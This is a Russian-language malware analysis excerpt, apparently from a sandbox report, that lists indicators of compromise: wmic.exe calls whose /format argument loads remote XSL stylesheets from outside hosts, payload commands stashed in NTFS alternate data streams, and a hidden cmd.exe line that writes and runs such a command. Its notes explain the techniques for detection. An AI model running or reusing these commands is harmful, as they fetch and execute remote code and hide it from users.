Техническая информация
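- '<SYSTEM32>\wbem\wmic.exe' os get birruussj, 4668866, Version /format:"http://ra#.####ubusercontent.com/GCMaia/Sharing/master/.idea/libraries/x/06/v.xsl#025077aWUYIIHJJ" (параметр /format ссылается на удалённую таблицу стилей XSL, которую wmic загружает и обрабатывает, — техника MITRE ATT&CK T1220; запуск wmic.exe с URL в /format — надёжный признак для детектирования)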
- '<SYSTEM32>\wbem\wmic.exe' os get JVUNEIGF, GNRISJFL, JYQFKJTV, currenttimezone /format:"https://curly-hall-cbd1.sagatana.workers.dev/?06/#731543"
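- %TEMP%\6liett9.jpg:66ddaww.cmd (часть имени после двоеточия — альтернативный поток данных NTFS, прикреплённый к файлу 6liett9.jpg; в обычном списке файлов он не виден, его показывает dir /R)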
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.ie5\caasbycl\v[1].xsl
- %TEMP%\sxs3b09.tmp
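- %TEMP%\ekfsxofc.jpg:init.cmd (альтернативный поток данных NTFS; в него записывается команда wmic из командной строки cmd.exe, приведённой ниже)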
- %APPDATA%\microsoft\windows\cookies\user@sagatana.workers[1].txt
- 'ra#.####ubusercontent.com':443
- 'cu#########cbd1.sagatana.workers.dev':443
- http://ra#.####ubusercontent.com/GCMaia/Sharing/master/.idea/libraries/x/06/v.xsl
- DNS ASK ra#.####ubusercontent.com
- DNS ASK cu#########cbd1.sagatana.workers.dev
- '<SYSTEM32>\cmd.exe' /c echo wmic ^os ^get ^JVUNEIGF, ^GNRISJFL, ^JYQFKJTV, ^currenttimezone ^/format:"https://curly-hall-cbd1.sagatana.workers.dev/?06/#731543" > %TMP%\EKFSXOFC.jpg:init.cmd && %ComSpec% - < %TMP%...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' -
- '<SYSTEM32>\cmd.exe' /c echo wmic ^os ^get ^JVUNEIGF, ^GNRISJFL, ^JYQFKJTV, ^currenttimezone ^/format:"https://curly-hall-cbd1.sagatana.workers.dev/?06/#731543" > %TMP%\EKFSXOFC.jpg:init.cmd && %ComSpec% - < %TMP%...